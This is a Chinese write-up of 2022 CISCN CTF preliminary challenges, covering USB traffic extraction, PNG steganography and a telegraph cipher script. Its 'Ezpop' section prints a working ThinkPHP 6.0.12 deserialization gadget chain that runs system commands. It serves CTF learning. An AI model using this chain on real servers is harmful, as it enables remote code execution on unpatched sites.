[2022CISCN]初赛 复现

这篇具有很好参考价值的文章主要介绍了[2022CISCN]初赛 复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ez_usb 

刚开始直接提取usb键盘流量,发现导出有问题

键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出

[2022CISCN]初赛 复现

tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt

提取出两段数据 

[2022CISCN]初赛 复现

 然后拿脚本去解键盘流量,分别得到数据如下

output: 526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700

output :35c535765e50074a

第一个数据用010保存16进制文件,得到一个rar文件

[2022CISCN]初赛 复现

第二个数据就是密码 

 [2022CISCN]初赛 复现

everlasting_night

仔细观察png数据块,通道隐藏的数据可以配合lsb隐写

PNG文件尾后面的16进制数据,是md5  

[2022CISCN]初赛 复现

[2022CISCN]初赛 复现

ohhWh04m1 

stegslove打开翻通道,A2通道有信息

[2022CISCN]初赛 复现

 [2022CISCN]初赛 复现

 f78dcd383f1b574b

lsb隐写脚本可以分离出东西 , f78dcd383f1b574b是密码

 [2022CISCN]初赛 复现

提取出来out文件,需要密码,就是ohhWh04m1 

解出来是个损坏的png,看wp有个工具gimp

需要重名名为data文件

gimp flag.data

[2022CISCN]初赛 复现

签到电台

在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。
发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。
(如果您还需要进一步的提示,可在本公众号输入“豪密剖析”获取。)
“弼时安全到达了”所对应的7个电码:1732 2514 1344 0356 0451 6671 0055
模十算法示例:1732与6378得到7000
发包示例:/send?msg=s 

a = '99643341808268586836775501600817585713493257766561476063601867596343105374607456471099628834298182339040868150740' \
     '9511612238587443601660278684275641000975730184165996600423556460848669900431897229857720894775658109911874842297207211' \
     '874555613481342526489469108931355995699901993003656750839977460316073816952542983844454554912374637487610435202414085664' \
     '59011252194284601222413675885829671754541410117754160428719487295645115327768288544685069742397764022225956726271320557630' \
     '43102657536225660163856239886863333649499474893205993474'[:28]
b = '1732251413440356045166710055'
res = ''
for i in range(28):
    tmp = (int(a[i]) + int(b[i])) % 10
    res += str(tmp)
print(res)

跟据提示脚本算出密文,然后根据session发包

Ezpop 

[2022CISCN]初赛 复现 

www.zip 源码泄露  

[2022CISCN]初赛 复现

在index.php下的index类中的test方法找到路由

寻找网上的链子 

ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

<?php

namespace think {
    abstract class Model
    {
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = '')
        {
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir /']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami', ['whoami']];
            $this->jsonAssoc = True;
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
    }
}

namespace {
    echo (urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

利用poc生成payload 

然后在正确路径下打 

[2022CISCN]初赛 复现

 修改命令 获得flag文章来源地址https://www.toymoban.com/news/detail-472713.html

到了这里,关于[2022CISCN]初赛 复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 全国大学生信息安全竞赛初赛writeup(历年CISCN真题与解析)

    收录了大佬们参加全国大学生信息安全竞赛初赛的writeup和真题环境,方便学习,排名不分先后,谨参考完整度和CSDN站内优先原则。 在此,对大佬们的分享表示由衷的敬意和诚挚的感谢! 第十二、十三届全国大学生信息安全竞赛——创新实践能力赛原题 如果遇到打不开的链

    2024年02月06日
    浏览(44)
  • 第十六届CISCN复现----MISC

     下载附件,发现是一个文件名为modus的压缩包,解压后是一个pcap文件,用wireshark打开 文件名modus,已经提示了工控流量,很多情况下都是和TCP协议结合起来的 工控CTF之协议分析1——Modbus_ctf modbus_Shadow丶S的博客-CSDN博客 直接追踪TCP  发现竟然出现了=,条件反射联想到base密码

    2024年02月11日
    浏览(26)
  • 第十六届CISCN复现MISC——国粹

    不是我说,我当时比赛的时候,在那里叭叭叭的数的老用心了结果他是一道非常不常规的图片密码题,又是一种我没见过的题型  看了一些大佬的解题,知道他是一个坐标类型的图片拼凑 发现很多都提到了opencv,又是一个知识点盲区 浅浅了解一下 opencv: OpenCV是一个基于Ap

    2024年02月11日
    浏览(34)
  • ciscn2022-线上-半决-pwn

    一个简单的可见字符shellcode 用杭电师傅的工具直接出shellcode,直接写进出就可以拿到shell。 epx: number是4个字节,后面malloc的参数也是4个字节,可以利用溢出使number很大,然后malloc申请的大小也在一个合理的范围之内。 malloc函数的实现会根据分配内存的size来决定使用哪个分配

    2024年02月06日
    浏览(24)
  • 智警杯初赛复现

    eee考核的时候搭建环境出了问题。。虽然有点久远,但还能看看 1.克隆centos 先查看第一台的ip ifconfig  编辑另外两台 进入根目录 编辑 更改项 重启   2.mobax  ssh连接三台   3.改三台名字 bash 查看改成功没有 4.编写network文件 master操作就可以 5.下载工具(三台) 6.编辑host文件

    2024年02月09日
    浏览(42)
  • 2022蓝帽杯初赛

    gg币哈哈哈哈哈哈哈哈哈哈 第一次做取证。。 这题用到d盾。好吧d盾也是第一次用hhh 把下载的www文件拖进去,然后他就开始扫描了 打开第一个文件看看 lanmaobei666外包NSSCTF{} 要给密码先查看数据库配置文件/application/database.php  发现password是my_encrypt()函数的返回值。 追踪这个函

    2024年02月12日
    浏览(27)
  • [蓝帽杯 2022 初赛]domainhacker

    打开流量包,追踪TCP流,看到一串url编码    放到瑞士军刀里面解密  最下面这一串会觉得像base64编码  删掉前面两个字符就可以base64解码  依次类推,提取到第13个流,得到一串编码其中里面有密码  导出http对象   发现最后有个1.rar文件 不出所料被加密了,拿刚才解得密码

    2024年02月11日
    浏览(35)
  • 2022第十五届全国大学生信息安全竞赛(ciscn)西南赛区部分WP

    EzSignin 访问题目flag是假的,F12源代码,看到base64解码 解码得到flag CODE 访问题目,有个aid.php直接访问不行,使用PHP为协议进行读取,input2需要等于Welcone!,这里要使用data协议编码一下,input3可以随便输入 得到aid.php的代码 很明显的反序列化,直接构造payload: exp: base64解码得

    2024年02月06日
    浏览(39)
  • 2022百度之星第一场初赛

    题目描述 题目思路 题目代码 2022百度之星第一场初赛题解

    2024年02月15日
    浏览(29)
  • csp-j(2022)初赛解析【选择题】

    答案:A。 【解析】面向对象考察的内容与类相关,题中唯一没有出现类的选项是A选项。printf函数在c语言中就存在。 答案:C 【解析】栈的特征:后进先出。 A选项:65进栈,5出栈,4进栈,4出栈,3进栈,3出栈,6出栈,21进栈,1出栈,2出栈。 B选项:654进栈,4出栈,5出栈,

    2024年02月16日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包